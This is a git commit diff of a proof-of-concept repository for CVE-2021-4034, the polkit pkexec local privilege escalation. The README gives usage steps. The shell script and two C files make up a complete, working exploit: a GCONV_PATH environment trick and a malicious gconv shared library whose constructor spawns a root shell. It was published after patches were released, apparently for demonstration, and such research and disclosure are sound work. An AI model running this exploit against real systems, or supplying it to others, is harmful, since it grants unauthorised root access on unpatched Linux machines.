Initial commit

LICENSE

@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <https://unlicense.org>

README.md

@@ -0,0 +1,40 @@
+CVE-2021-4034 Proof of Concept
+==============================
+
+Qualys researches found a pretty cool local privilege escalation vulnerability
+in Polkit's `pkexec`: [writeup][qualys-wup], [tweet][qualys-tweet]. This vuln
+has been around and exploitable on major Linux distros for quite a long time.
+Security patches have been published, so I decided to write a very simple PoC to
+show how trivial it is to exploit this. The code in this repo should be really
+self-explanatory after reading the linked write-up. Also thanks to
+[@Drago1729][drago-twitter] for the idea and [the help][drago-tweet].
+
+How to:
+
+1. Get a vulnerable version of `pkexec` e.g. from `policykit-1 <= 0.105-31` in
+   the [Debian repos][polkit-debian] or even built [from source][polkit-source].
+   You can  have it locally installed or just copy get the `pkexec` executable
+   alone directly in this directory.
+2. Ensure you have GCC installed in order to compile the two C helpers in this
+   repo.
+3. Run `./expl.sh` and enjoy.
+
+**NOTE**: `expl.sh` will first look for `pkexec` in the current working directory,
+then fall-back to `$PATH`. Since `pkexec` is usually a setuid-root executable,
+maybe run this in a VM and not on your machine, y'know...
+
+Demo:
+
+![result](terminal.gif)
+
+
+
+Cheers, @mebeim :)
+
+
+[qualys-wup]:    https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
+[qualys-tweet]:  https://mobile.twitter.com/qualys/status/1486034484323569664
+[polkit-debian]: http://ftp.us.debian.org/debian/pool/main/p/policykit-1/
+[polkit-source]: https://salsa.debian.org/utopia-team/polkit/-/commits/master/
+[drago-twitter]: https://twitter.com/Drago1729/
+[drago-tweet]:   https://twitter.com/Drago1729/status/1486145716544319494

expl.sh

@@ -0,0 +1,26 @@
+#!/bin/sh
+
+set -e
+
+# Setup:
+# .
+# ├── GCONV_PATH=.
+# │   └── fake_exe
+# └── fake_exe
+#     ├── gconv-modules
+#     └── UTF-16.so
+
+mkdir -p 'GCONV_PATH=.'
+touch 'GCONV_PATH=./fake_exe'
+chmod +x 'GCONV_PATH=./fake_exe'
+
+mkdir -p fake_exe
+echo 'module INTERNAL UTF-16// UTF-16 1' > fake_exe/gconv-modules
+
+gcc -o helper helper.c
+gcc -fPIC -shared -o fake_exe/UTF-16.so fake_module.c
+
+set +e
+env PATH="$(pwd):$PATH" ./helper
+
+rm -rf 'GCONV_PATH=.' fake_exe helper

fake_module.c

@@ -0,0 +1,29 @@
+/**
+ * A fake gconv module (shared library) which runs arbitrary code when loaded by
+ * the dynamic loader.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <sys/types.h>
+
+void __attribute__ ((constructor)) init(void) {
+	if (geteuid() == 0) {
+		fputs("Pwned!\n", stderr);
+
+		setuid(0);
+		setgid(0);
+		setegid(0);
+
+		setenv("PATH", "/usr/local/bin:/usr/bin:/bin", 1);
+		execvp("sh", (char *[]){"sh", NULL});
+		perror("execvp failed");
+	} else {
+		fputs("Failed :(\n", stderr);
+	}
+
+	syscall(SYS_exit_group, 1);
+}

helper.c

@@ -0,0 +1,33 @@
+/**
+ * Just an helper to run pkexec with empty argv and the appropriate env vars.
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int main(void) {
+	char *const envp[] = {
+		// This pointer will be overridden by pkexec with an OOB write on argv.
+		"fake_exe",
+
+		// If this dir exists and fake_exe exists within it,
+		// g_find_program_in_path() will return "GCONV_PATH=./fake_exe", which
+		// will overwrite envp[0] essentially setting up the GCOV_PATH env var.
+		"PATH=GCONV_PATH=.",
+
+		// A shell that is not be present under /etc/shells, so that
+		// pkexec's validate_environment_variable() fails, calling g_printerr().
+		"SHELL=x",
+
+		// An encoding that is not UTF-8, so g_printerr() invokes a loadable
+		// module (fake_module.c) for string conversion from GCOV_PATH.
+		"CHARSET=UTF-16",
+		NULL
+	};
+
+	execvpe("pkexec", (char *[]){NULL}, envp);
+	perror("execvpe failed");
+	return 1;
+}